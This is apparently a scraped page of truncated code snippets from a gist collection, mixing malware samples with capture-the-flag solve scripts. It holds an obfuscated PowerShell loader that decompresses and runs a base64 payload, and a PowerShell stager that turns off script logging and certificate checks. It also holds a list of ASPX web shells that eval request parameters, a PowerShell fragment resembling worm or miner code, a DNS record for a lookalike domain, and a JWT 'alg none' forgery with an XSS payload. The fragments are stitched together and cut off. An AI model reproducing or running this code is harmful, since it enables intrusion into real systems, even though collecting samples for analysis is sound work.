This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
H4sIAAb/EF0CA7VWa2+bSBT9nEj5D6iyBCjExombNpEqLdgmhhrHBD9iu9YKwwBTj4HC4Jh0+9/3jg1p | |
qqS77UqLbDGP+zz3zFz8PHIpjiMuu+1xX0+Oj4ZO6mw4oRa/u5C4GnZvxaMjWK49GhfcB05YKEnSiTcO | |
jpbX1+08TVFED/P6DaJKlqHNimCUCSL3FzcNUYrOblefkUu5r1ztz/oNiVcOKcWKtuOGiDtTIo/t9WPX | |
YaHU7YRgKvCfPvHi4qy5rHe/5A7JBN4uMoo2dY8QXuS+iczhqEiQwJvYTeMs9ml9iqOL8/o4yhwfDcDa | |
FpmIhrGX8SIkAb8U0TyNOJYO0z/sCjwMh2nsKp6XoizjJW7BLC+Wyz+ERen2Lo8o3qC6HlGUxomN0i12 | |
UVbvOZFH0B3yl6Bl0xRHwVIUQWwbr5FQi3JCJO53zAgD9FCB9qtKwnMlkBrSVJSgii/TNGMvJ+igyL8S | |
Jyu8CE9ZfIDt28nxybFf8WR1ZU6fEwVGR4v9GEFswjDO8F7uAydLnAluHBqnBUxrozRH4vIJWa7mIzxI | |
pZ8baFbSIBs/3K/nsLaYxNhbgk5Zz1roPIxabOPnxOwgH0eoU0TOBrsV94TXYEY+Qfs065XYAMIS+HID | |
eR1EUOBQhhyr9gu17gbTJ101x8RDqeJCqTKICqoo/hjMoRgCr0cm2gBMhznQr+YD41ElXbK8qLyzOQjx | |
beJkmcQNczhyrsTZyCHIkzglynC5peQ03g/57+GaOaHYdTJamVuKT0CWDttxlNE0d6F0kPzITpCLHcKw |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if ([IntPtr]::Size -eq 4) { | |
$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe' | |
}else{ | |
$b='powershell.exe' | |
}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import re | |
h = open('secret.c') | |
lines = [ x[:-1] for x in h.readlines() ] # remove newline char | |
h.close() | |
flag = [] | |
for line in lines: | |
num =''.join(re.findall(r'\s+', line)).replace('\t','1').replace(' ','0') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
exiftool -b favicon/00000.png | dd bs=1 skip=156 | head -c -84 2>/dev/null > file | |
for i in {00001..00109} | |
do | |
exiftool -b favicon/$i.png | dd bs=1 skip=156 | head -c -84 2>/dev/null >> file | |
done | |
strings file | grep -i "IceCTF" --color=none | tail -n 1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"Status": 0, | |
"TC": false, | |
"RD": true, | |
"RA": true, | |
"AD": false, | |
"CD": false, | |
"Question": [ | |
{ | |
"name": "dmarc.jqueryupdatejs.com.", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
first_piece = '{ "typ": "JWT", "alg": "none" }' | |
our_xss = '<script>alert("xss")</script>' | |
second_piece = ''' | |
{ "username": "%s", | |
"flag": "IceCTF{hope you don\'t think this is a real flag}"}''' \ | |
% our_xss.replace('"','\\"') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivte0dbG8+P7vtsim6Wfp1kXe4re7z75MT17/5M+8zst82m5/Oflp+pFuv35brNLddPu8qJs23f2Z9KRaXuZ1+6yuFtsnzWW6/e08m+V1+sXxyc808m6l7+bvVtlyhm/u/MZJW1//4t84+bHfbZktcur248/LapKVv+/L16e/9+nJx/gmf5efl9kFffm70c8mp89e5FcGk9fXTZsvxm/mNfVH+I+/WLf5u3Trd2vrdT5isKPv1fn59w0c6vOXTLN2Ov/Fv+Q3Tn7j5HebtQT587zdfpq1ebr9rKoXWZt+fH39xRezGSHwu62ydk5NPvrd8uXlI+pr9fv+vtPpdFxWFx/9xomlmqLY5k27zW/we3g9rxcF+ki3vvc6n67ror0ev6SXpsUqK8ffLZaz6qqxH3x/Q6OzWb5s6ZvvP3pECJ+s65r+3rpzZ3zWnC1fVWW+qYcn66Jspdn304+OZ4tiWRDyWVvVHxFNfre3+TVGSXP+2UefgAk++egXZpf4PbukX2lym6Ja0t9bINZ3F4VhhROalCalXu7t/f5f0mizlggi03JnrK8RgEnR9l8eeOvL18f1dF601GRd5+kn6Ue/EPTd++wj+l1Ijc9m1SIrlvxhB+4Vw51WixVxQ90o2Kfcnl9dN3kt0DCrX70+ffXi+ItT/urla/1C+OU3TorzLelzO/9F6cfPsrLJP77zi5UNzwiyzHW63V6v8vS8KMGieEmmnpv+mPL5j/1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0..4|%{try | |
{ | |
$LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False; | |
$u=[System.Text.Encoding]::UTF8; | |
sAl er Get-Random; | |
$l=[System.Net.WebRequest]; | |
sAL no New-Object; | |
$g=[SysTEm.Net.SeRvICePoIntMAnaGEr]; | |
$g::Expect100ConTINuE=0; | |
$g::ServerCertificateValidationCallback={1}; |
We can make this file beautiful and searchable if this error is corrected: Illegal quoting in line 2.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Occurrences, WebShell Source | |
190, <script language="JScript" runat="server">function Page_Load(){eval(Request["NO9BxmCXw0JE"],"unsafe");}</script> | |
50, <script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script> | |
11, <script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script> | |
7, <script language="JScript" runat="server">function Page_Load(){eval(Request["error"],"unsafe");}</script> | |
5, <script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script> | |
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["7gHQRih3fnam"],"unsafe");}</script> | |
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["coStWhkzUF7n"],"unsafe");}</script> | |
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["E9RyGFIM8h3S"],"unsafe");}</script> | |
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["EiH4yV2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC) | |
try{ | |
$name = 'Global\PSEXEC' | |
$exeflag = $flase | |
New-Object System.Threading.Mutex ($true,$name,[ref]$exeflag) | |
}catch{} | |
| |
$dt = Get-Date -Format 'yyMMdd' | |
$path = "$env:temp\\ccc.log" | |
[string]$flag = test-path $path |